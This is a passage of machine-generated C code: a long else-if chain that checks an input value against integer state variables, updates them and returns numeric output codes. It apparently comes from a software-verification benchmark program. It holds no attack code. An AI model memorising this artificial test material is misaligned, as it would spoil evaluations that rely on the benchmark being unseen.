} else if(((((((input==1)&&((((((a26==18)&&(a28==15))&&!(a7==1))&&(a14==20))||((((a28==15)&&(a26==19))&&!(a7==1))&&(a14==20)))||((a14==18)&&((a7==1)&&((a28==16)&&(a26==17))))))&&(a25==1))&&(a3==1))&&(a4==18))&&(a1==1))){
a4 = 16;
a14 = 18;
a7 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if((((((a14==18)&&(((a25==1)&&((((a26==17)||(a26==18))&&(input==2))&&(a1==1)))&&(a28==17)))&&(a7==1))&&!(a3==1))&&(a4==17))){
a14 = 19;
a4 = 18;
a26 = 19;
a3 = 1;
return 26;
} else if((((a25==1)&&(((a1==1)&&((input==1)&&((((!(a7==1)&&((a26==18)&&(a28==16)))&&(a14==20))||((!(a7==1)&&((a26==19)&&(a28==16)))&&(a14==20)))||((a14==18)&&((a7==1)&&((a26==17)&&(a28==17)))))))&&(a4==16)))&&!(a3==1))){
a7 = 1;
a14 = 18;
a28 = 15;
a3 = 1;
a26 = 17;
return -1;
} else if(((a1==1)&&(((((a4==17)&&((a28==16)&&((((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19))))&&(input==4))))&&(a14==18))&&(a25==1))&&!(a3==1)))){
a26 = 17;
a7 = 1;
a3 = 1;
a28 = 15;
a4 = 16;
return -1;
} else if((((((a14==19)&&(((((input==5)&&(a26==18))&&(a1==1))&&(a25==1))&&(a28==15)))&&!(a3==1))&&(a7==1))&&(a4==18))){
a28 = 17;
a3 = 1;
a26 = 17;
return 26;
} else if(((a25==1)&&((a14==18)&&((a1==1)&&((a7==1)&&(((a28==16)&&((a4==18)&&(((a26==17)||(a26==18))&&(input==4))))&&!(a3==1))))))){
a4 = 16;
a26 = 17;
a3 = 1;
a28 = 15;
return -1;
} else if(((((a7==1)&&((a4==18)&&(((!(a3==1)&&(((a26==17)||(a26==18))&&(input==2)))&&(a28==15))&&(a14==18))))&&(a25==1))&&(a1==1))){
a3 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if(((((a3==1)&&((a14==18)&&((a26==18)&&((a4==18)&&((a28==17)&&((input==5)&&(a1==1)))))))&&(a25==1))&&!(a7==1))){
a7 = 1;
a28 = 16;
a4 = 16;
a26 = 19;
a3 = 0;
return 22;
} else if((((a25==1)&&((a1==1)&&((a28==15)&&(!(a3==1)&&((a4==18)&&((a14==19)&&((input==4)&&((a26==18)||(a26==19)))))))))&&!(a7==1))){
a26 = 17;
a4 = 16;
a7 = 1;
a3 = 1;
a14 = 18;
return -1;
} else if(((!(a7==1)&&((a25==1)&&((a4==16)&&((a14==20)&&((a28==15)&&(!(a3==1)&&((input==1)&&((a26==17)||(a26==18)))))))))&&(a1==1))){
a4 = 18;
a28 = 17;
a26 = 19;
a3 = 1;
a14 = 18;
return -1;
} else if(((a25==1)&&((a4==17)&&((a7==1)&&((((a28==15)&&(((a26==19)&&(input==4))&&(a3==1)))&&(a1==1))&&(a14==20)))))){
a4 = 16;
a26 = 17;
a14 = 18;
return -1;
} else if(((a28==16)&&((a3==1)&&((a1==1)&&((a25==1)&&(((((!(a7==1)&&(a26==17))||(((a7==1)&&(a26==18))||((a7==1)&&(a26==19))))&&(input==4))&&(a4==17))&&(a14==20))))))){
a14 = 18;
a7 = 1;
a4 = 16;
a28 = 15;
a26 = 17;
return -1;
} else if(((a14==19)&&(((((a28==16)&&((a25==1)&&((((a26==17)&&!(a7==1))||(((a7==1)&&(a26==18))||((a7==1)&&(a26==19))))&&(input==1))))&&(a1==1))&&(a3==1))&&(a4==18)))){
a14 = 20;
a28 = 15;
a26 = 19;
a7 = 1;
a4 = 16;
a3 = 0;
return 26;
} else if(((a14==18)&&(!(a3==1)&&((a1==1)&&(((a28==17)&&((a4==17)&&(((!(a7==1)&&(a26==18))||(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17))))&&(input==4))))&&(a25==1)))))){
a4 = 16;
a7 = 1;
a3 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if(((a28==15)&&(((((a25==1)&&((a14==18)&&((a4==18)&&((input==3)&&((a26==17)||(a26==18))))))&&!(a3==1))&&(a7==1))&&(a1==1)))){
a26 = 17;
a4 = 16;
a3 = 1;
return -1;
} else if((((a1==1)&&(((((a4==17)&&((input==1)&&((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||((a26==17)&&!(a7==1)))))&&!(a3==1))&&(a14==18))&&(a25==1)))&&(a28==16))){
a3 = 1;
a4 = 16;
a7 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if(((a28==15)&&(!(a7==1)&&((a25==1)&&(!(a3==1)&&((a1==1)&&((a26==17)&&(((input==5)&&(a4==17))&&(a14==20))))))))){
return -1;
} else if(((a25==1)&&((a4==18)&&(((a28==15)&&(!(a3==1)&&((((a14==18)&&(!(a7==1)&&(a26==19)))||(((a7==1)&&(a26==17))&&(a14==19)))&&(input==1))))&&(a1==1))))){
a4 = 16;
a26 = 17;
a7 = 1;
a14 = 18;
a3 = 1;
return -1;
} else if(((((a26==18)&&(((a4==17)&&((!(a7==1)&&((input==2)&&(a28==15)))&&(a25==1)))&&(a1==1)))&&!(a3==1))&&(a14==19))){
a4 = 16;
a3 = 1;
a14 = 18;
a7 = 1;
a26 = 17;
return -1;
} else if(((((!(a3==1)&&((a14==20)&&((a4==16)&&((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==2)))))&&(a25==1))&&(a1==1))&&(a28==16))){
a14 = 18;
a3 = 1;
a7 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if(((((((a4==16)&&((((input==2)&&((a26==17)||(a26==18)))&&(a25==1))&&!(a7==1)))&&(a14==19))&&(a28==15))&&(a1==1))&&!(a3==1))){
a14 = 18;
a7 = 1;
a26 = 17;
a3 = 1;
return -1;
} else if(((a28==15)&&((a25==1)&&(!(a3==1)&&((a4==17)&&(((input==2)&&(((a14==19)&&((a26==18)&&(a7==1)))||((((a26==19)&&!(a7==1))&&(a14==18))||(((a7==1)&&(a26==17))&&(a14==19)))))&&(a1==1))))))){
a3 = 1;
a14 = 18;
a26 = 17;
a4 = 16;
a7 = 1;
return -1;
} else if((((a25==1)&&((a14==18)&&(((a28==17)&&((a1==1)&&((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==5))))&&(a3==1))))&&(a4==17))){
a26 = 19;
a28 = 16;
a4 = 18;
a7 = 0;
return 22;
} else if((((a4==17)&&(((a28==17)&&(((a1==1)&&((a25==1)&&((input==5)&&!(a7==1))))&&(a14==19)))&&!(a3==1)))&&(a26==18))){
a14 = 18;
a7 = 1;
a28 = 15;
a4 = 16;
a3 = 1;
a26 = 17;
return -1;
} else if(((a14==19)&&(((a7==1)&&((((a26==18)&&((a1==1)&&((input==2)&&(a28==15))))&&(a25==1))&&(a4==18)))&&!(a3==1)))){
a14 = 20;
a28 = 16;
a3 = 1;
a26 = 17;
return 26;
} else if((((a14==19)&&(!(a3==1)&&((((a1==1)&&((input==1)&&(((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))))&&(a25==1))&&(a4==18))))&&(a28==15))){
a7 = 1;
a4 = 16;
a26 = 17;
a3 = 1;
a14 = 18;
return -1;
} else if(((a4==17)&&(!(a3==1)&&((((a25==1)&&((((!(a7==1)&&(a26==17))||(((a7==1)&&(a26==18))||((a7==1)&&(a26==19))))&&(input==2))&&(a28==16)))&&(a1==1))&&(a14==18))))){
a26 = 17;
a4 = 16;
a28 = 15;
a7 = 1;
a3 = 1;
return -1;
} else if(((a7==1)&&((!(a3==1)&&((((((a14==18)&&(input==2))&&(a25==1))&&(a1==1))&&(a4==16))&&(a26==19)))&&(a28==17)))){
a26 = 17;
a3 = 1;
a28 = 15;
return -1;
} else if((((((a1==1)&&(((a28==16)&&((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))&&(input==3)))&&(a4==18)))&&(a14==20))&&!(a3==1))&&(a25==1))){
a4 = 16;
a3 = 1;
a7 = 0;
a26 = 17;
a14 = 19;
return -1;
} else if(((a28==16)&&(((a4==17)&&(!(a3==1)&&((((a25==1)&&((input==4)&&((a26==19)||((a26==17)||(a26==18)))))&&(a1==1))&&(a14==19))))&&(a7==1)))){
a4 = 16;
a3 = 1;
a26 = 17;
a28 = 15;
a14 = 18;
return -1;
} else if((((a4==17)&&((a14==19)&&((a25==1)&&((((a1==1)&&((input==3)&&(a28==17)))&&!(a3==1))&&(a26==18)))))&&!(a7==1))){
a14 = 18;
a7 = 1;
a26 = 17;
a3 = 1;
a4 = 16;
a28 = 15;
return -1;
} else if(((a4==18)&&((a25==1)&&(((a1==1)&&((input==3)&&((((!(a7==1)&&((a26==18)&&(a28==15)))&&(a14==20))||((a14==20)&&(!(a7==1)&&((a26==19)&&(a28==15)))))||((((a26==17)&&(a28==16))&&(a7==1))&&(a14==18)))))&&(a3==1))))){
a7 = 1;
a26 = 17;
a28 = 15;
a4 = 16;
a14 = 18;
return -1;
} else if(((a3==1)&&((a25==1)&&(((a1==1)&&((a28==17)&&((((a14==19)&&((a26==19)&&!(a7==1)))||((a14==20)&&((a7==1)&&(a26==17))))&&(input==4))))&&(a4==18))))){
a14 = 18;
a4 = 16;
a28 = 15;
a26 = 17;
a7 = 1;
return -1;
} else if(((a3==1)&&((a25==1)&&(((input==3)&&(((a14==20)&&((((a4==17)&&(a26==19))&&(a28==17))&&!(a7==1)))||(((((a26==17)&&(a4==18))&&(a28==15))&&(a7==1))&&(a14==18))))&&(a1==1))))){
a28 = 15;
a26 = 17;
a7 = 1;
a14 = 18;
a4 = 16;
return -1;
} else if((((a25==1)&&(((a1==1)&&((a4==17)&&((((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))||(!(a7==1)&&(a26==18)))&&(input==4))&&(a14==20))))&&(a3==1)))&&(a28==17))){
a7 = 0;
a14 = 18;
a26 = 17;
a4 = 18;
return 26;
} else if(((((((a1==1)&&((input==6)&&(((a14==19)&&((a7==1)&&(a26==18)))||(((!(a7==1)&&(a26==19))&&(a14==18))||((a14==19)&&((a26==17)&&(a7==1)))))))&&!(a3==1))&&(a25==1))&&(a28==17))&&(a4==18))){
a7 = 0;
a14 = 18;
a26 = 17;
a4 = 17;
a28 = 15;
return 24;
} else if(((a4==16)&&((!(a3==1)&&((a1==1)&&(!(a7==1)&&((((a26==17)&&(input==6))&&(a28==17))&&(a14==18)))))&&(a25==1)))){
a28 = 15;
a3 = 1;
a7 = 1;
return -1;
} else if((((((a1==1)&&((a28==17)&&((a25==1)&&(((input==3)&&(a14==20))&&(a26==18)))))&&(a3==1))&&!(a7==1))&&(a4==18))){
a28 = 16;
a7 = 1;
a4 = 16;
a3 = 0;
a14 = 19;
return 22;
} else if(((a1==1)&&((a4==18)&&((a14==20)&&((a28==16)&&((!(a7==1)&&(!(a3==1)&&(((a26==18)||(a26==19))&&(input==6))))&&(a25==1))))))){
a3 = 1;
a26 = 19;
a4 = 16;
a14 = 18;
a7 = 1;
return -1;
} else if(((!(a3==1)&&(((a1==1)&&(((((input==3)&&((a26==17)||(a26==18)))&&(a7==1))&&(a14==18))&&(a28==16)))&&(a25==1)))&&(a4==18))){
a14 = 19;
a26 = 17;
return 24;
} else if((((a1==1)&&((a28==15)&&(((a3==1)&&(((((a14==19)&&((a26==19)&&!(a7==1)))||(((a26==17)&&(a7==1))&&(a14==20)))||((a14==20)&&((a7==1)&&(a26==18))))&&(input==2)))&&(a25==1))))&&(a4==18))){
a26 = 17;
a14 = 18;
a7 = 1;
a4 = 16;
return -1;
} else if(((a1==1)&&(((a4==17)&&((a25==1)&&((input==3)&&(((a14==18)&&(((a28==16)&&(a26==17))&&(a7==1)))||(((a14==20)&&(((a26==18)&&(a28==15))&&!(a7==1)))||((((a28==15)&&(a26==19))&&!(a7==1))&&(a14==20)))))))&&!(a3==1)))){
a14 = 18;
a4 = 16;
a7 = 1;
a26 = 17;
a3 = 1;
a28 = 15;
return -1;
} else if((!(a7==1)&&((a25==1)&&(!(a3==1)&&(((a14==18)&&(((a1==1)&&(((a26==18)||(a26==19))&&(input==3)))&&(a28==16)))&&(a4==16)))))){
a28 = 15;
a26 = 18;
a14 = 20;
return 26;
} else if((!(a3==1)&&(((a1==1)&&((a25==1)&&(((((a14==18)&&((a26==19)&&!(a7==1)))||(((a7==1)&&(a26==17))&&(a14==19)))&&(input==4))&&(a28==17))))&&(a4==16)))){
a7 = 1;
a14 = 18;
a3 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if((((a1==1)&&((a28==15)&&((a14==19)&&((a4==18)&&(((input==6)&&(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17))))&&!(a3==1))))))&&(a25==1))){
a14 = 18;
a3 = 1;
a7 = 1;
a26 = 17;
a4 = 16;
return -1;
} else if(((a28==15)&&((a14==19)&&(((((a26==18)&&((a1==1)&&((a25==1)&&(input==1))))&&(a3==1))&&(a7==1))&&(a4==18))))){
a14 = 18;
a4 = 16;
a26 = 17;
return -1;
} else if((((a3==1)&&((((a1==1)&&((input==6)&&((((a7==1)&&(a26==17))&&(a14==19))||(((!(a7==1)&&(a26==18))&&(a14==18))||((!(a7==1)&&(a26==19))&&(a14==18))))))&&(a25==1))&&(a28==17)))&&(a4==17))){
a14 = 19;
a28 = 16;
a4 = 18;
a26 = 17;
a7 = 1;
return 26;
} else if((((a1==1)&&((a25==1)&&((a4==18)&&(((input==6)&&(((a14==20)&&((a26==18)&&(a7==1)))||((((a26==19)&&!(a7==1))&&(a14==19))||(((a26==17)&&(a7==1))&&(a14==20)))))&&(a28==16)))))&&!(a3==1))){
a26 = 17;
a4 = 17;
a7 = 0;
a14 = 18;
a28 = 15;
return 21;
} else if(((((a25==1)&&((a7==1)&&((((a1==1)&&((a4==18)&&(input==4)))&&(a3==1))&&(a26==19))))&&(a14==20))&&(a28==15))){
a14 = 18;
a4 = 16;
a26 = 17;
return -1;
} else if(((a28==15)&&((a14==20)&&((((a7==1)&&((((input==4)&&(a1==1))&&(a25==1))&&!(a3==1)))&&(a26==19))&&(a4==16))))){
a3 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if((((a3==1)&&((a4==17)&&((((((input==1)&&(a7==1))&&(a1==1))&&(a26==19))&&(a25==1))&&(a14==20))))&&(a28==15))){
a4 = 16;
a14 = 18;
a26 = 17;
return -1;
} else if((((a25==1)&&(!(a3==1)&&((a1==1)&&(((((a14==18)&&(!(a7==1)&&(a26==19)))||(((a7==1)&&(a26==17))&&(a14==19)))&&(input==2))&&(a4==18)))))&&(a28==15))){
a3 = 1;
a14 = 18;
a26 = 17;
a7 = 1;
a4 = 16;
return -1;
} else if((((a4==16)&&((a25==1)&&(((a1==1)&&((((a14==18)&&(!(a7==1)&&(a26==19)))||(((a26==17)&&(a7==1))&&(a14==19)))&&(input==3)))&&!(a3==1))))&&(a28==17))){
a26 = 17;
a14 = 18;
a3 = 1;
a7 = 1;
a28 = 15;
return -1;
} else if(((a25==1)&&((a1==1)&&((a14==20)&&(!(a3==1)&&((a4==17)&&((a7==1)&&(((a28==16)&&(input==3))&&(a26==17))))))))){
a28 = 15;
a3 = 1;
a4 = 16;
a14 = 18;
return -1;
} else if(((a4==18)&&(((a28==15)&&(((a7==1)&&((((input==4)&&((a26==17)||(a26==18)))&&(a14==18))&&(a1==1)))&&(a25==1)))&&!(a3==1)))){
a4 = 16;
a26 = 17;
a3 = 1;
return -1;
} else if(((a14==20)&&(((((a7==1)&&((((input==6)&&((a26==17)||(a26==18)))&&(a28==15))&&(a25==1)))&&!(a3==1))&&(a1==1))&&(a4==16)))){
a3 = 1;
a14 = 18;
a26 = 17;
return -1;
} else if(((a14==19)&&(!(a3==1)&&(((((a1==1)&&((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==5)))&&(a28==15))&&(a25==1))&&(a4==17))))){
a7 = 1;
a14 = 18;
a4 = 16;
a3 = 1;
a26 = 17;
return -1;
} else if(((a25==1)&&(!(a3==1)&&(((((a14==20)&&((((a26==19)||((a26==17)||(a26==18)))&&(input==4))&&(a1==1)))&&(a7==1))&&(a28==15))&&(a4==17))))){
a14 = 18;
a3 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if(((a1==1)&&(((a3==1)&&(((a4==18)&&(((((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==5))&&(a25==1)))&&(a28==17)))&&(a14==18)))){
a7 = 1;
a4 = 16;
a28 = 15;
a26 = 17;
return -1;
} else if(((a28==17)&&(((((a4==17)&&((a3==1)&&(((input==1)&&(a1==1))&&(a25==1))))&&(a7==1))&&(a14==20))&&(a26==18)))){
a28 = 15;
a4 = 16;
a14 = 18;
a26 = 17;
return -1;
} else if(((a28==17)&&(((a1==1)&&((a3==1)&&(((a25==1)&&(((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19))))&&(input==5)))&&(a4==18))))&&(a14==19)))){
a14 = 18;
a26 = 19;
a7 = 0;
return 24;
} else if(((((a1==1)&&((a25==1)&&((((input==3)&&(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17))))&&(a14==18))&&(a28==16))))&&(a4==16))&&!(a3==1))){
a26 = 17;
a7 = 1;
a3 = 1;
a28 = 15;
return -1;
} else if(((a28==15)&&((((a3==1)&&((((((!(a7==1)&&(a26==19))&&(a14==19))||((a14==20)&&((a7==1)&&(a26==17))))||(((a7==1)&&(a26==18))&&(a14==20)))&&(input==5))&&(a25==1)))&&(a4==18))&&(a1==1)))){
a7 = 1;
a14 = 18;
a4 = 16;
a26 = 17;
return -1;
} else if(((((a25==1)&&(((input==4)&&(((a14==18)&&((a7==1)&&((a28==16)&&(a26==17))))||(((!(a7==1)&&((a26==18)&&(a28==15)))&&(a14==20))||((!(a7==1)&&((a28==15)&&(a26==19)))&&(a14==20)))))&&(a3==1)))&&(a4==17))&&(a1==1))){
a14 = 18;
a26 = 17;
a7 = 1;
a4 = 16;
a28 = 15;
return -1;
} else if((((a4==18)&&((((a26==18)&&((!(a7==1)&&((input==3)&&(a28==15)))&&!(a3==1)))&&(a14==18))&&(a25==1)))&&(a1==1))){
a26 = 17;
a3 = 1;
a4 = 16;
a7 = 1;
return -1;
} else if((((((a4==17)&&((a14==19)&&(((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))&&(input==4))&&!(a3==1))))&&(a1==1))&&(a25==1))&&(a28==17))){
a14 = 20;
a7 = 0;
a26 = 17;
return 24;
} else if((!(a3==1)&&((((a28==16)&&((((a1==1)&&((input==3)&&((a26==18)||(a26==19))))&&!(a7==1))&&(a14==20)))&&(a4==18))&&(a25==1)))){
a7 = 1;
a4 = 16;
a28 = 17;
a26 = 18;
a14 = 18;
return 24;
} else if(((a25==1)&&(((a1==1)&&((a3==1)&&((a28==17)&&((input==6)&&(((a14==19)&&((a26==19)&&!(a7==1)))||(((a7==1)&&(a26==17))&&(a14==20)))))))&&(a4==18)))){
a26 = 18;
a14 = 19;
a7 = 1;
return 26;
} else if((((((((!(a7==1)&&((a28==17)&&(((a4==18)&&(a3==1))&&(a26==19))))&&(a14==20))||((a14==18)&&((a7==1)&&(((!(a3==1)&&(a4==16))&&(a26==17))&&(a28==15)))))||(((a7==1)&&((a28==15)&&(((a4==16)&&!(a3==1))&&(a26==18))))&&(a14==18)))&&(input==1))&&(a25==1))&&(a1==1))){
a4 = 16;
a14 = 19;
a26 = 19;
a3 = 0;
a7 = 1;
a28 = 16;
return 26;
} else if(((a1==1)&&((a25==1)&&(((a4==17)&&((a28==16)&&(((input==2)&&((((a7==1)&&(a26==18))||((a7==1)&&(a26==19)))||(!(a7==1)&&(a26==17))))&&(a3==1))))&&(a14==19))))){
a14 = 18;
a26 = 17;
a7 = 1;
a28 = 15;
a4 = 16;
return -1;
} else if(((a28==16)&&(((a14==20)&&((!(a3==1)&&(((a1==1)&&((a7==1)&&(input==1)))&&(a26==17)))&&(a4==17)))&&(a25==1)))){
a14 = 18;
a4 = 16;
a3 = 1;
a28 = 15;
return -1;
} else if((!(a7==1)&&((((((a14==20)&&((a28==15)&&((input==1)&&(a3==1))))&&(a26==17))&&(a25==1))&&(a1==1))&&(a4==18)))){
a7 = 1;
a4 = 16;
a14 = 18;
return -1;
} else if((!(a3==1)&&((a14==19)&&(((a4==16)&&(((a25==1)&&(((input==2)&&((a26==17)||(a26==18)))&&(a28==16)))&&(a7==1)))&&(a1==1))))){
a26 = 17;
a3 = 1;
a14 = 18;
a28 = 15;
return -1;
} else if(((((a4==18)&&((((((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||((a26==17)&&!(a7==1)))&&(input==5))&&(a28==17))&&(a1==1))&&(a25==1)))&&(a3==1))&&(a14==20))){
a26 = 17;
a14 = 18;
a7 = 1;
a4 = 16;
a28 = 15;
return -1;
} else if((((a14==20)&&((a1==1)&&((a4==16)&&(((a28==17)&&((input==2)&&(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))))&&!(a3==1)))))&&(a25==1))){
a7 = 1;
a26 = 17;
a14 = 18;
a28 = 15;
a3 = 1;
return -1;
} else if(((((a28==15)&&(((a4==18)&&(((a26==19)&&((input==5)&&(a14==20)))&&(a1==1)))&&(a3==1)))&&(a25==1))&&(a7==1))){
a3 = 0;
a14 = 18;
a4 = 16;
return 26;
} else if(((((a28==15)&&(((a4==18)&&(((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==3))&&(a25==1)))&&(a1==1)))&&!(a3==1))&&(a14==19))){
a3 = 1;
a14 = 18;
a4 = 16;
a7 = 1;
a26 = 17;
return -1;
} else if(((a1==1)&&((a25==1)&&(((((a7==1)&&(((a14==20)&&(input==2))&&(a26==19)))&&(a4==16))&&!(a3==1))&&(a28==15))))){
a14 = 18;
a26 = 17;
a3 = 1;
return -1;
} else if(((a4==16)&&((!(a3==1)&&(((input==2)&&(((!(a7==1)&&((a26==19)&&(a28==15)))&&(a14==20))||(((a7==1)&&((a28==16)&&(a26==17)))&&(a14==18))))&&(a1==1)))&&(a25==1)))){
a14 = 19;
a7 = 0;
a28 = 17;
a26 = 17;
return 26;
} else if((((a1==1)&&((!(a3==1)&&((a14==19)&&((a28==16)&&((a26==19)&&((input==2)&&!(a7==1))))))&&(a25==1)))&&(a4==17))){
a26 = 17;
a28 = 15;
a4 = 16;
a7 = 1;
a3 = 1;
a14 = 18;
return -1;
} else if((((a1==1)&&(((input==4)&&((((((a4==17)&&(a26==19))&&(a28==17))&&!(a7==1))&&(a14==20))||(((a7==1)&&((a28==15)&&((a26==17)&&(a4==18))))&&(a14==18))))&&(a3==1)))&&(a25==1))){
a14 = 18;
a28 = 15;
a4 = 16;
a7 = 1;
a26 = 17;
return -1;
} else if(((a14==19)&&((a1==1)&&((a3==1)&&((a4==17)&&(((a25==1)&&((((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==4)))&&(a28==16))))))){
a4 = 16;
a26 = 17;
a7 = 1;
a28 = 15;
a14 = 18;
return -1;
} else if(((!(a3==1)&&(((((!(a7==1)&&((input==1)&&(a4==17)))&&(a25==1))&&(a26==18))&&(a1==1))&&(a14==19)))&&(a28==17))){
a7 = 1;
a4 = 18;
a14 = 18;
a28 = 15;
return 24;
} else if(((((((((((a26==17)&&!(a7==1))||(((a7==1)&&(a26==18))||((a7==1)&&(a26==19))))&&(input==1))&&(a4==17))&&(a14==18))&&(a25==1))&&(a1==1))&&(a3==1))&&(a28==16))){
a26 = 17;
a28 = 15;
a7 = 1;
a4 = 16;
return -1;
} else if(((((((a14==18)&&((a28==16)&&((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))&&(input==6))))&&(a25==1))&&(a1==1))&&(a4==16))&&!(a3==1))){
a28 = 15;
a7 = 1;
a3 = 1;
a26 = 17;
return -1;
} else if(((a4==16)&&(((a7==1)&&((!(a3==1)&&(((a14==18)&&((a26==19)&&(input==4)))&&(a28==17)))&&(a25==1)))&&(a1==1)))){
a3 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if(((a28==16)&&(((a4==17)&&((((input==6)&&((((a7==1)&&(a26==17))&&(a14==20))||((((a26==18)&&!(a7==1))&&(a14==19))||((!(a7==1)&&(a26==19))&&(a14==19)))))&&(a25==1))&&(a3==1)))&&(a1==1)))){
a7 = 1;
a14 = 18;
a28 = 15;
a4 = 16;
a26 = 17;
return -1;
} else if(((a1==1)&&((!(a7==1)&&(((((((a26==18)||(a26==19))&&(input==5))&&(a25==1))&&!(a3==1))&&(a28==16))&&(a14==20)))&&(a4==18)))){
a26 = 17;
a28 = 15;
a4 = 17;
return 24;
} else if((((!(a3==1)&&((a28==15)&&(((input==1)&&(((a14==19)&&((a26==18)&&(a7==1)))||(((a14==18)&&(!(a7==1)&&(a26==19)))||(((a7==1)&&(a26==17))&&(a14==19)))))&&(a4==17))))&&(a1==1))&&(a25==1))){
a4 = 16;
a14 = 18;
a3 = 1;
a7 = 1;
a26 = 17;
return -1;
} else if(((a25==1)&&((a1==1)&&(!(a3==1)&&(((input==4)&&(((!(a7==1)&&((a26==19)&&(a28==15)))&&(a14==20))||(((a7==1)&&((a28==16)&&(a26==17)))&&(a14==18))))&&(a4==16)))))){
a3 = 1;
a26 = 17;
a7 = 1;
a28 = 15;
a14 = 18;
return -1;
} else if(((((((!(a3==1)&&(((input==1)&&(a25==1))&&(a28==15)))&&(a14==20))&&(a1==1))&&(a4==17))&&(a26==17))&&!(a7==1))){
a7 = 1;
a26 = 19;
return -1;
} else if((((!(a3==1)&&((a14==20)&&((a4==17)&&(((a1==1)&&(((a26==18)||(a26==19))&&(input==1)))&&(a28==16)))))&&!(a7==1))&&(a25==1))){
a26 = 17;
return -1;
} else if((((a4==16)&&(((((a28==15)&&((a14==19)&&(((a26==17)||(a26==18))&&(input==1))))&&!(a3==1))&&!(a7==1))&&(a1==1)))&&(a25==1))){
a3 = 1;
a26 = 17;
a7 = 1;
a14 = 18;
return -1;
} else if(((!(a7==1)&&((a25==1)&&((a1==1)&&((a3==1)&&((a4==18)&&(((input==4)&&((a26==18)||(a26==19)))&&(a28==16)))))))&&(a14==19))){
a7 = 1;
a28 = 15;
a26 = 17;
a14 = 18;
a4 = 16;
return -1;
} else if(((a28==15)&&((((a7==1)&&((a4==17)&&(((a25==1)&&(((a26==18)||(a26==19))&&(input==1)))&&(a1==1))))&&!(a3==1))&&(a14==18)))){
a26 = 18;
return 23;
} else if(((a26==19)&&((a28==16)&&((!(a7==1)&&((a3==1)&&(((a25==1)&&((input==4)&&(a4==18)))&&(a1==1))))&&(a14==18))))){
a7 = 1;
a4 = 16;
a26 = 17;
a28 = 15;
return -1;
} else if(((((a25==1)&&((a28==17)&&(!(a3==1)&&(((((a14==19)&&((a26==19)&&!(a7==1)))||((a14==20)&&((a26==17)&&(a7==1))))||((a14==20)&&((a7==1)&&(a26==18))))&&(input==3)))))&&(a1==1))&&(a4==16))){
a7 = 1;
a26 = 17;
a3 = 1;
a14 = 18;
a28 = 15;
return -1;
} else if(((((((a25==1)&&((!(a7==1)&&((input==1)&&(a28==15)))&&(a1==1)))&&(a4==17))&&!(a3==1))&&(a14==19))&&(a26==19))){
a3 = 1;
a7 = 1;
a4 = 16;
a14 = 18;
a26 = 17;
return -1;
} else if(((((a1==1)&&((a28==15)&&((a4==17)&&((input==6)&&(((((a26==19)&&!(a7==1))&&(a14==18))||((a14==19)&&((a7==1)&&(a26==17))))||(((a7==1)&&(a26==18))&&(a14==19)))))))&&(a25==1))&&!(a3==1))){
a7 = 0;
a28 = 16;
a26 = 19;
a14 = 19;
return 22;
} else if(((a14==18)&&((a28==17)&&((((a25==1)&&(!(a3==1)&&((a1==1)&&(((a26==17)||(a26==18))&&(input==4)))))&&(a4==18))&&(a7==1))))){
a14 = 19;
a26 = 18;
a28 = 15;
a3 = 1;
a4 = 16;
return -1;
} else if((!(a7==1)&&((a28==17)&&((a14==18)&&(((a1==1)&&((a26==18)&&(!(a3==1)&&((input==2)&&(a25==1)))))&&(a4==16)))))){
a28 = 15;
a3 = 1;
a26 = 17;
a7 = 1;
return -1;
} else if(((!(a3==1)&&(((((((((a26==17)||(a26==18))||(a26==19))&&(input==4))&&!(a7==1))&&(a25==1))&&(a1==1))&&(a28==17))&&(a14==20)))&&(a4==17))){
a3 = 1;
a4 = 16;
a14 = 18;
a28 = 15;
a26 = 17;
a7 = 1;
return -1;
} else if((((((((a4==17)&&(((input==5)&&(a25==1))&&(a1==1)))&&(a14==20))&&(a3==1))&&(a26==18))&&(a7==1))&&(a28==15))){
a4 = 16;
a26 = 17;
a14 = 18;
return -1;
} else if(((a4==16)&&(((a25==1)&&((a1==1)&&((input==5)&&(((a14==18)&&((a7==1)&&((a28==17)&&(a26==17))))||(((((a26==18)&&(a28==16))&&!(a7==1))&&(a14==20))||((a14==20)&&(((a26==19)&&(a28==16))&&!(a7==1))))))))&&!(a3==1)))){
a14 = 18;
a26 = 17;
a3 = 1;
a28 = 15;
a7 = 1;
return -1;
} else if(((a25==1)&&((a3==1)&&((((a4==17)&&(((((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==6))&&(a28==16)))&&(a14==19))&&(a1==1))))){
a28 = 15;
a7 = 1;
a26 = 17;
a4 = 16;
a14 = 18;
return -1;
} else if(((((((a4==16)&&(!(a7==1)&&((a14==18)&&((input==5)&&(a1==1)))))&&!(a3==1))&&(a28==17))&&(a25==1))&&(a26==18))){
a28 = 15;
a7 = 1;
a3 = 1;
a26 = 17;
return -1;
